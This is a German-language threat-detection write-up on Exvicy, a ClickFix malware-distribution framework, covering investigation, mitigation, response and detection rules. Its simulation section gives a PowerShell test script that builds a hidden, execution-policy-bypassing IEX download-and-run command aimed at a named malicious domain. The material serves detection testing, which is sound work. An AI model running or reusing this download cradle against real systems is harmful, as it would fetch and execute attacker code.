Exvicy: Ein Nachahmer des ErrTraffic-Malware-Verteilungsframeworks
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Exvicy ist ein aufstrebendes Malware-as-a-Service (MaaS) ClickFix Distribution Framework, das in Cybercrime-Foren beworben wird. Es nutzt Social Engineering, indem es Cloudflare Turnstile Herausforderungen imitiert, um Benutzer dazu zu bringen, bösartige PowerShell-Befehle über das Windows-Ausführungsdialogfeld auszuführen. Das Framework kopiert ErrTraffic eng und verwendet große Teile von dessen JavaScript-Codebasis und Verschleierungstechniken.
Untersuchung
TDR-Analysten schwenkten von einem Screenshot eines Administration Panels, das im Exploit.IN-Forum geteilt wurde, um aktive C2-Infrastruktur aufzudecken. Durch die Analyse spezifischer Cloudflare-Nameserver und Domainregistrierungsmuster identifizierten Forscher mehrere bösartige Domains und kompromittierte WordPress-Websites. Technische Analysen bestätigten die umfangreiche Wiederverwendung von ErrTraffic-Code, einschließlich markanter JavaScript-Funktionen und Anti-Analyse-Logik.
Minderung
Organisationen sollten robustes Webfiltering einsetzen, um bekannte bösartige Domains und verdächtige Top-Level-Domains (TLDs), die mit diesen Kampagnen in Verbindung stehen, zu blockieren. Endpunktschutz sollte anomale PowerShell-Ausführungen überwachen und einschränken, insbesondere Befehle, die irm or iex. Benutzer sollten auch darauf trainiert werden, Social-Engineering-Aufforderungen zu erkennen, die sie dazu anweisen, Tastenkombinationen wie Win+R zu verwenden, um Befehle auszuführen.
Antwort
Wenn Exvicy-Aktivität festgestellt wird, sollten betroffene Hosts sofort isoliert werden, um zusätzliche Befehlsausführung oder Payload-Lieferung zu stoppen. Reaktionskräfte sollten PowerShell-Betriebsprotokolle überprüfen, um ausgeführte Befehle und zugehörige Netzwerkverbindungen zu identifizieren. Bekannte C2-IP-Adressen und Domains sollten am Perimeter blockiert werden, gefolgt von einer Durchsuchung nach anderen kompromittierten WordPress-Assets in der Umgebung.
Angriffsverlauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Verdächtiger Command and Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)
Verdächtiger RunMRU-Eintrag mit LOLBin-Semantik (via registry_event)
IOC (SourceIP) zur Erkennung: Exvicy: Ein Nachahmer des ErrTraffic-Malware-Distributions-Frameworks
IOC (DestinationIP) zur Erkennung: Exvicy: Ein Nachahmer des ErrTraffic-Malware-Distributions-Frameworks
Erkennung bösartiger PowerShell-Befehlsausführung für Exvicy-Malware [Windows-Powershell]
Exvicy Framework-Befehlsausführung über die Verknüpfung Win + R [Windows-Prozesserstellung]
Simulationsausführung
-
Angriffserzählung & Kommandos: Ein Angreifer liefert einem Benutzer über Phishing eine bösartige Verknüpfung oder ein Dokument. Bei der Ausführung (T1204.002) löst der Benutzer unwissentlich einen PowerShell-Prozess (T1059.001) aus. Ziel des Angreifers ist es, einen Fuß in der Tür zu bekommen, indem er ein sekundäres Payload herunterlädt. Um das Exvicy-Framework zu imitieren, wird die Befehlszeile so gestaltet, dass sie die spezifische bekannte-bösartige Domain
recaptcha-check.com/8E9curHNH8UfAMLzenthält, um den bösartigen Agent herunterzuladen. -
Regressionstest-Skript:
# Simulationsskript, um die Exvicy-Erkennungsregel auszulösen. # Dies imitiert die Befehlszeilenmuster, die in der Sigma-Regel identifiziert wurden. $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz" $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`"" Write-Host "[+] Starte Simulation: Ausführen von Befehlen, um die Erkennung auszulösen..." Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`"" Write-Host "[+] Simulationsbefehl gesendet. Überprüfen Sie SIEM auf Warnungen." -
Bereinigungskommandos:
# Bereinigung: Durch diese spezielle Simulation werden keine permanenten Dateien erstellt, # aber wir stellen sicher, dass keine verbleibenden PowerShell-Prozesse laufen. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue Write-Host "[+] Bereinigung abgeschlossen."